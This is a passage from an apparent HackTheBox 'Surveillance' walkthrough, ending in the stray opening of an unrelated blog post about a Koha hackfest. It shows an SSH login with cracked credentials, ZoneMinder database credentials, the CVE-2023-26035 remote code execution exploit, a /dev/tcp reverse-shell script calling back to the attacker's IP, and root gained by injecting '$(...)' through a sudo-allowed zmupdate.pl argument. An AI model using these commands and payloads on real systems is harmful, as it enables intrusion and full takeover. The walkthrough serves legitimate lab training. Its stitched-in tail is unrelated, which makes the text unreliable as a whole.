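A cost of 13 means 2^13 = 8192 rounds of key setup per guess, so a dictionary attack on the bcrypt value is far slower than on the unsalted digest.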

Via SSH we get access as the user matthew!

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# ssh matthew@surveillance.htb

matthew@surveillance.htb's password:

Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

System information as of Tue Dec 12 02:34:21 AM UTC 2023

System load: 0.08935546875 Processes: 233

Usage of /: 85.1% of 5.91GB Users logged in: 0

Memory usage: 16% IPv4 address for eth0: 10.129.45.83

Swap usage: 0%

=> / is using 85.1% of 5.91GB

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.

See https://ubuntu.com/esm or run: sudo pro status

Last login: Tue Dec 5 12:43:54 2023 from 10.10.14.40

And with that we get the user flag.

matthew@surveillance:~$ ls -a

. .. .bash_history .bash_logout .bashrc .cache .profile user.txt

matthew@surveillance:~$ cat user.txt

b4ddc33ff47b1d8534c59a7609b48f13

Lateral movement

Now that we have SSH access as matthew, we enumerate the system again, looking for a way to escalate privileges to root.

Searching more files for sensitive data turns up the following credentials for another database:

-rw-r--r-- 1 root zoneminder 3503 Oct 17 11:32 /usr/share/zoneminder/www/api/app/Config/database.php

'password' => ZM_DB_PASS,

'database' => ZM_DB_NAME,

'host' => 'localhost',

'password' => 'ZoneMinderPassword2023',

'database' => 'zm',

$this->default['host'] = $array[0];

$this->default['host'] = ZM_DB_HOST;

These credentials belong to an application called ZoneMinder, an open-source application for closed-circuit television monitoring, basically security cameras.

An interesting point is that there is another user named zoneminder, and an application is running on port 8080.

Searching for known vulnerabilities in ZoneMinder, we find CVE-2023-26035.

The CVE is an unauthenticated remote code execution. The snapshot action does not check whether the request is authorized to run it. The action expects an ID that fetches an existing monitor, but it also accepts an object that creates a new one. The TriggerOn function then calls shell_exec with the supplied ID, which results in RCE.

To run the exploit, we need a tunnel so that the application listening locally on the server can be reached from our machine. We use ssh for this:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# ssh -L 8081:127.0.0.1:8080 matthew@surveillance.htb

matthew@surveillance.htb's password:

Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)

In this writeup we will use this PoC.

First, we use pwncat to listen on port 9002:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# pwncat-cs -lp 9002

[21:01:10] Welcome to pwncat 🐈! __main__.py:164

With the repository cloned on our machine, we run the exploit as follows:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance/CVE-2023-26035]

└─# python3 exploit.py -t http://127.0.0.1:8081 -ip 10.10.14.174 -p 9002

[>] fetching csrt token

[>] recieved the token: key:f3dbd44dfe36d9bf315bcf7b9ad29a97463a4bb7,1702432913

[>] executing...

[>] sending payload..

[!] failed to send payload

Even though the script reports that sending the payload failed, our pwncat listener receives the following:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# pwncat-cs -lp 9002

[21:01:10] Welcome to pwncat 🐈! __main__.py:164

[21:01:55] received connection from 10.129.44.183:43356 bind.py:84

[21:02:04] 10.129.44.183:43356: registered new host w/ db manager.py:957

(local) pwncat$

(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ ls -lah /home/zoneminder/

total 20K

drwxr-x--- 2 zoneminder zoneminder 4.0K Nov 9 12:46 .

drwxr-xr-x 4 root root 4.0K Oct 17 11:20 ..

lrwxrwxrwx 1 root root 9 Nov 9 12:46 .bash_history -> /dev/null

-rw-r--r-- 1 zoneminder zoneminder 220 Oct 17 11:20 .bash_logout

-rw-r--r-- 1 zoneminder zoneminder 3.7K Oct 17 11:20 .bashrc

-rw-r--r-- 1 zoneminder zoneminder 807 Oct 17 11:20 .profile

This gives us a shell as the zoneminder user. Once again, we enumerate.

With sudo -l we can see a command that the zoneminder user is allowed to run with root privileges:

(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ sudo -l

Matching Defaults entries for zoneminder on surveillance:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User zoneminder may run the following commands on surveillance:

(ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *

The user can run any script in /usr/bin whose name starts with zm followed by a letter and ends with the .pl extension, which indicates Perl. We can also pass arguments.
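To see which file names the sudoers entry covers, the pattern can be approximated with a shell-style glob. The sketch below is only an approximation under stated assumptions: the helper name `allowed` is hypothetical, the arguments part of the rule (the trailing `*`) is ignored, and the directory is compared separately because wildcards in a sudoers command path do not match `/`, whereas `*` in Python's `fnmatch` would.

```python
from fnmatch import fnmatchcase

# Directory and file-name glob taken from the sudo -l output above.
SUDO_DIR = "/usr/bin"
SUDO_NAME_GLOB = "zm[a-zA-Z]*.pl"


def allowed(path: str) -> bool:
    """Approximate whether `path` matches /usr/bin/zm[a-zA-Z]*.pl."""
    directory, _, name = path.rpartition("/")
    # Compare the directory exactly so that '*' cannot span a '/'.
    return directory == SUDO_DIR and fnmatchcase(name, SUDO_NAME_GLOB)


if __name__ == "__main__":
    for candidate in (
        "/usr/bin/zmupdate.pl",
        "/usr/bin/zmonvif-probe.pl",
        "/usr/bin/zm1.pl",
        "/usr/bin/perl",
    ):
        print(candidate, allowed(candidate))
```

The character class only constrains the first character after zm, so names containing a hyphen such as zmonvif-probe.pl still match.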

Here are all the scripts we can run as root:

(remote) zoneminder@surveillance:/home/zoneminder$ ls -alh /usr/bin/zm*.pl

-rwxr-xr-x 1 root root 43K Nov 23 2022 /usr/bin/zmaudit.pl

-rwxr-xr-x 1 root root 13K Nov 23 2022 /usr/bin/zmcamtool.pl

-rwxr-xr-x 1 root root 6.0K Nov 23 2022 /usr/bin/zmcontrol.pl

-rwxr-xr-x 1 root root 26K Nov 23 2022 /usr/bin/zmdc.pl

-rwxr-xr-x 1 root root 35K Nov 23 2022 /usr/bin/zmfilter.pl

-rwxr-xr-x 1 root root 5.6K Nov 23 2022 /usr/bin/zmonvif-probe.pl

-rwxr-xr-x 1 root root 19K Nov 23 2022 /usr/bin/zmonvif-trigger.pl

-rwxr-xr-x 1 root root 14K Nov 23 2022 /usr/bin/zmpkg.pl

-rwxr-xr-x 1 root root 18K Nov 23 2022 /usr/bin/zmrecover.pl

-rwxr-xr-x 1 root root 4.8K Nov 23 2022 /usr/bin/zmstats.pl

-rwxr-xr-x 1 root root 2.1K Nov 23 2022 /usr/bin/zmsystemctl.pl

-rwxr-xr-x 1 root root 13K Nov 23 2022 /usr/bin/zmtelemetry.pl

-rwxr-xr-x 1 root root 5.3K Nov 23 2022 /usr/bin/zmtrack.pl

-rwxr-xr-x 1 root root 19K Nov 23 2022 /usr/bin/zmtrigger.pl

-rwxr-xr-x 1 root root 45K Nov 23 2022 /usr/bin/zmupdate.pl

-rwxr-xr-x 1 root root 8.1K Nov 23 2022 /usr/bin/zmvideo.pl

-rwxr-xr-x 1 root root 6.9K Nov 23 2022 /usr/bin/zmwatch.pl

-rwxr-xr-x 1 root root 20K Nov 23 2022 /usr/bin/zmx10.pl

We had to work out what each script does, which is much easier with this documentation.

The focus was on scripts that let us inject data, that is, scripts that accept user-supplied parameters.

Another important point: if the payload is executed as soon as we enter it, it runs as the zoneminder user.

We need the payload to be carried through and executed later, so that it runs as root.

Among the scripts is zmupdate.pl, which checks whether updates exist for ZoneMinder and runs the upgrade migrations. It also backs up the database with mysqldump, a command that receives user input (username and password) and runs as root.

First, we create a file named rev.sh with the following content:

#!/bin/bash

sh -i 5<> /dev/tcp/10.10.14.229/9001 0<&5 1>&5 2>&5

On our own machine, we use pwncat to listen on port 9001:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# pwncat-cs -lp 9001

[17:14:01] Welcome to pwncat 🐈! __main__.py:164

Now we pass the string '$(/home/zoneminder/rev.sh)' as input to the script. Because of the single quotes, our shell reads the special characters literally, so the value is stored in the variable exactly as written, without being executed.

We run it as follows:

(remote) zoneminder@surveillance:/home/zoneminder$ sudo /usr/bin/zmupdate.pl --version=1 --user='$(/home/zoneminder/rev.sh)' --pass=ZoneMinderPassword2023

Initiating database upgrade to version 1.36.32 from version 1

WARNING - You have specified an upgrade from version 1 but the database version found is 1.26.0. Is this correct?

Press enter to continue or ctrl-C to abort :

Do you wish to take a backup of your database prior to upgrading?

This may result in a large file in /tmp/zm if you have a lot of events.

Press 'y' for a backup or 'n' to continue : y

Creating backup to /tmp/zm/zm-1.dump. This may take several minutes.

The database password is the one we found earlier. Our pwncat listener then receives the following:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# pwncat-cs -lp 9001

[17:14:01] Welcome to pwncat 🐈! __main__.py:164

[17:18:06] received connection from 10.129.42.193:39340 bind.py:84

[17:18:10] 0.0.0.0:9001: normalizing shell path manager.py:957

[17:18:12] 0.0.0.0:9001: upgrading from /usr/bin/dash to /bin/bash manager.py:957

[17:18:14] 10.129.42.193:39340: registered new host w/ db manager.py:957

(local) pwncat$

(remote) root@surveillance:/home/zoneminder# id

uid=0(root) gid=0(root) groups=0(root)

We have a shell as root! Now we can grab the root flag!

(remote) root@surveillance:/home/zoneminder# ls -a /root

. .. .bash_history .bashrc .cache .config .local .mysql_history .profile root.txt .scripts .ssh

(remote) root@surveillance:/home/zoneminder# cat /root/root.txt

4e69a27f8fc2279a0a149909c8ff2af4

Now that we are root, it is interesting to look at the process list and see how the mysqldump command was executed:

(remote) root@surveillance:/home/zoneminder# ps aux | grep mysqldump

root 3035 0.0 0.0 2888 1064 pts/3 S+ 22:18 0:00 sh -c mysqldump -u$(/home/zoneminder/rev.sh) -p'ZoneMinderPassword2023' -hlocalhost --add-drop-table --databases zm > /tmp/zm/zm-1.dump

As planned, the value was kept intact at first. Only on the second evaluation, when sh parsed the mysqldump command line, was the special syntax interpreted and the command executed.
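The ps output shows why this works: the user value is pasted unquoted into a string that `sh -c` parses again, while the password is wrapped in single quotes. The same two-stage effect can be reproduced harmlessly. The sketch below is not ZoneMinder's code; it uses a hypothetical value that only echoes a word, assumes a POSIX `sh`, and contrasts an interpolated shell string with two safer alternatives.

```python
import shlex
import subprocess
import sys

# Harmless stand-in for the injected value: a command substitution that only echoes.
user_value = "$(echo injected)"

# Helper command that prints its first argument verbatim, without involving a shell.
PRINT_ARG = [sys.executable, "-c", "import sys; print(sys.argv[1])"]


def run_via_shell_string(value: str) -> str:
    """Unsafe: the value is pasted into a command line that sh parses again."""
    cmd = f"echo {value}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def run_via_shell_quoted(value: str) -> str:
    """Safer: shlex.quote makes the shell treat the value as one literal word."""
    cmd = f"echo {shlex.quote(value)}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def run_via_argv(value: str) -> str:
    """Safest: no shell at all, the value is passed as a single argument."""
    result = subprocess.run(PRINT_ARG + [value], capture_output=True, text=True)
    return result.stdout.strip()


if __name__ == "__main__":
    print(run_via_shell_string(user_value))  # the substitution is executed
    print(run_via_shell_quoted(user_value))  # the value stays literal
    print(run_via_argv(user_value))          # the value stays literal
```

Quoting the value or passing an argument list instead of a command string removes the second round of shell parsing, which is what a fix for this class of bug comes down to.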

And that completes the Surveillance machine!

Things I learned at the Koha Hackfest in Marseille

domm (Perl and other tech)Published on Friday 19 April 2024 07:00

Last week we (aka HKS3) attended the Koha Hackfest in Marseille, hosted by BibLibre. The hackfest is a yearly meeting of Koha developers and other interested parties, which has taken place in Marseille for about 10 years. For me, it was the first time!